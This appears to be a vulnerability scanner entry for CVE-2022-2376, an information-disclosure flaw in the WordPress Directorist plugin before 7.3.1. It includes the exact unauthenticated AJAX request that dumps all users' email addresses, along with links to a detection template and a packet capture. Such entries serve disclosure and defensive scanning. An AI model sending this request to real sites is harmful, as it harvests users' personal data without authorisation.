| Title | WordPress Directorist <7.3.1 - Information Disclosure |
|---|---|
| Author | Random-Robbie |
| Severity | Medium |
| Impact | An attacker can gain sensitive information about the WordPress installation, potentially leading to further attacks. |
| Remediation | Fixed in version 7.3.1. |
| CVSS Score | 5.3 |
| EPSS Score | 0.10489 |
| CVE ID | CVE-2022-2376 |
| CWE ID | CWE-862 |
| Tags | cve cve2022 wp-plugin wpscan wordpress wp directorist unauth disclosure wpwax vkev vuln |
WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.
GET /wp-admin/admin-ajax.php?action=directorist_author_pagination HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2376.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-2376.pcap
N/AN/A